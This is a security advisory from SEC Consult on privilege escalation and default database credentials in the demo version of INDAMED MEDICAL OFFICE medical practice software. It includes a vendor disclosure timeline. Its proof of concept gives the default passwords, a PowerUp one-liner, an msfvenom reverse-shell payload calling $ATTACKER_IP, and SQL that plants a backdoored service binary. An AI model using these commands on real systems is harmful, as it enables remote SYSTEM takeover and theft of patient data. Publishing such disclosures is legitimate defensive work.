📄 INDAMED - MEDICAL OFFICE Demo Version Privilege Escalation / Default Credentials

SEC Consult Vulnerability Lab Security Advisory < 20250604-0 >
    =======================================================================
                  title: Local Privilege Escalation and Default Credentials
                product: INDAMED - MEDICAL OFFICE (Medical practice management)
                         Demo version
     vulnerable version: Revision 18544 (II/2024)
          fixed version: Q2/2025 (Privilege Escalation, Default Password)
                         Q3/2025 (medoff DBA Privileges)
             CVE number: -
                 impact: critical
               homepage: https://www.indamed.de
                  found: 2024-05-08
                     by: Daniel Hirschberger (Office Bochum)
                         Tobias Niemann (Office Bochum)
                         Florian Stuhlmann (Office Bochum)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Eviden business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    (Translated)
    "MEDICAL OFFICE is a versatile doctor's software that provides you with
    excellent support in practice management. Various modules give you the
    opportunity to expand MEDICAL OFFICE Professional individually. The practice
    software is therefore very well suited for use in a wide variety of medical
    practices, supra-local group practices, medical care centers (MVZ), therapeutic
    practices and hospital outpatient departments. "
    
    Source: https://www.indamed.de/
    
    
    Business recommendation:
    ------------------------
    The vendor clarified that only our tested demo version from their website is
    affected by the identified security issues. The production environment
    is hardened by their certified technicians and medical facilities are configured
    in accordance with the security guidelines of the "Kassenärztliche
    Bundesvereinigung (KBV)".
    
    The vendor provides a further hardened software update as well.
    
    SEC Consult highly recommends to perform a thorough security review of the
    product conducted by security professionals to identify and resolve potential
    further security issues.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Local Privilege Escalation (Demo version)
    The installation of MEDICAL OFFICE defaults to the folder "C:\INDAMED" and
    installs services which are running with "NT AUTHORITY\SYSTEM" permissions.
    Attackers can replace existing services with their own malicious services to
    escalate privileges to "SYSTEM".
    
    2) Hardcoded Credentials (Demo version)
    The application uses a Firebird database for statistical medical data and a
    MariaDB for the core data, e.g. users, patients, patient data, etc. For both
    databases default or easily guessable credentials are used. An attacker can use
    this to exfiltrate data, falsify records or in combination with the previous
    vulnerability, execute arbitrary code as the "SYSTEM" user by exploiting it
    remotely via the network.
    
    
    Proof of concept:
    -----------------
    1) Local Privilege Escalation (Demo version)
    By default, MEDICAL OFFICE is installed in the folder "C:\INDAMED" and contains
    several service binaries which are run as "SYSTEM". By renaming one of the
    following services and writing a malicious service binary with the original name
    of the service, an attacker can escalate privileges to "SYSTEM":
    
    guardian.exe
    moserver.exe
    
    Example:
    While the moserver.exe is running an attacker can rename the file to
    moserverx.exe and drop a malicious service binary with the name moserver.exe.
    Afterwards one has to restart the moserver.exe service which is not possible for
    normal users. The attacker can however reboot the machine to complete the attack.
    
    An easier variant uses the fact that dropping a service binary with the
    name "guardian.new" will force the currently running guardian to stop, copy the
    "guardian.new" to "guardian.exe" and then start the service.
    
    By utilizing PowerUp's 'Write-ServiceBinary'
    (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1),
    the attack can be simplified to the following oneliner:
    
    Write-ServiceBinary -UserName secconsult -Name "MEDICAL OFFICE - Guardian" -Path C:\INDAMED\guardian.new
    
    <privesc.png>
    
    
    2) Hardcoded Credentials (Demo version)
    MEDICAL OFFICE uses a Firebird database for statistical medical data which is
    located at "C:\INDAMED\dat\MOSTAT242G.gdb". The Firebird server uses the default
    credentials "SYSDBA:masterkey". Fortunately, the Firebird server is not
    exposed by default.
    
    The core database which contains user, patients and medical data is a MariaDB
    instance which is listening on port 2020 and uses the default credentials
    "medoff:medoff". The installer creates a firewall rule to allow connections to
    this port.
    
    <firewall.png>
    
    The hardcoded credentials can be used to login in to the MariaDB with the user medoff
    who has DBA rights:
    <db_grants.png>
    
    By using TEMPORARY TABLES, LOAD DATA LOCAL and SELECT INTO OUTFILE, an attacker
    can write a malicious service binary to "C:\INDAMED\guardian.new". This seems to
    be used during an update to restart the guardian service. As soon as a
    "guardian.new" is detected the currently running guardian service stops all
    processes, copies "guardian.new" to "guardian.exe" and starts the new guardian
    executable with SYSTEM permissions.
    
    The attack can be performed in two parts:
    
    a) Create a backdoored guardian.exe
    A backdoored service executable can i.e. be created with msfvenom:
    
    --------------------------------------------------------------------------------
    msfvenom -p windows/shell_reverse_tcp -o guardian.new LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -k -f exe -x guardian.exe
    --------------------------------------------------------------------------------
    
    b) Upload and save the backdoored guardian.exe to "C:\INDAMED\guardian.new":
    --------------------------------------------------------------------------------
    USE medoff;
    CREATE TEMPORARY TABLE mytest (payload LONGBLOB);
    LOAD DATA LOCAL INFILE "backdoor.exe" INTO TABLE mytest FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED by 'doesnotexist';
    SELECT * FROM mytest INTO OUTFILE "C:\INDAMED\guardian.new" FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED BY 'doesnotexist';
    --------------------------------------------------------------------------------
    
    Afterwards, MEDICAL OFFICE seems to work as usual and spawns a reverse shell on
    the attacker's machine:
    
    <revshell.png>
    
    
    Vulnerable / tested versions:
    -----------------------------
    The following version has been tested which was the latest version available
    at the time of the test:
    * Revision 18544 (II/2024) - Demo version from the vendor's website
    
    
    Vendor contact timeline:
    ------------------------
    2024-10-07: Contacting vendor through [email protected]
    2024-10-08: Vendor responds professionally and asks for details.
                Sending security advisory to vendor.
    2024-10-24: Asking for a status update.
    2024-10-28: Vendor CEO states that they are working on a statement
                and on fixing the issues. They also ask for our client
                who authorized the assessment. We respond that this was
                done on our behalf as part of a research project.
    2024-11-12: Asking for a status update.
    2024-11-13: Vendor asks for a delay of the disclosure.
    2024-11-14: We agree to delay the disclosure.
    2025-01-13: Asking for a status update.
    2025-01-21: Vendor responds, that local network access is necessary and
                all medical facilities are required to adhere to the security guides
                of the "Kassenärztliche Bundesvereinigung (KBV)".
                Regarding issue 1), only certified technicians are performing
                the installation and the guidelines have been verified and
                updated. Future updates will optimize the installation further
                and remove extended permissions.
                Regarding issue 2), this only affects the demo version, only secure
                passwords are used for production environments.
                Future improvements include validation and adaptation/removal of access
                rights of the "medoff" user. Those will be rolled out in March 2025.
    2025-01-22: Thanking the vendor for the detailed response. Asking when most
                customers will have the new hardened SW version to coordinate
                our release.
    2025-03-04: We ask for a date when the patch is done.
    2025-03-12: Update Q2/25 will fix the upgrade process and ensure that
                that new installations get a complex database password.
                Q3/25 will then further harden the database user.
    2025-03-18: We ask for coordination regarding the publication date and
                offer to write a small success story.
    2025-04-16: We ask for a suitable publication date.
    2025-05-20: Vendor CEO tells us that we can proceed with publishing the
                advisory and that he is interested in highlighting our work in a
                small success story. Additionally, he thanks us for our patience and
                professionalism.
    2025-06-04: Coordinated release of advisory.
    
    
    Solution:
    ---------
    The vendor clarified that only our tested demo version from their website is
    affected by the identified security issues. The production environment
    is hardened by their certified technicians and medical facilities are configured
    in accordance with the security guidelines of the "Kassenärztliche
    Bundesvereinigung (KBV)".
    Additionally, the vendor implemented a revised upgrade process as well as a
    hardened database password.
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Eviden business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: https://blog.sec-consult.com
    X: https://x.com/sec_consult
    
    EOF Daniel Hirschberger, Tobias Niemann, Florian Stuhlmann / @2025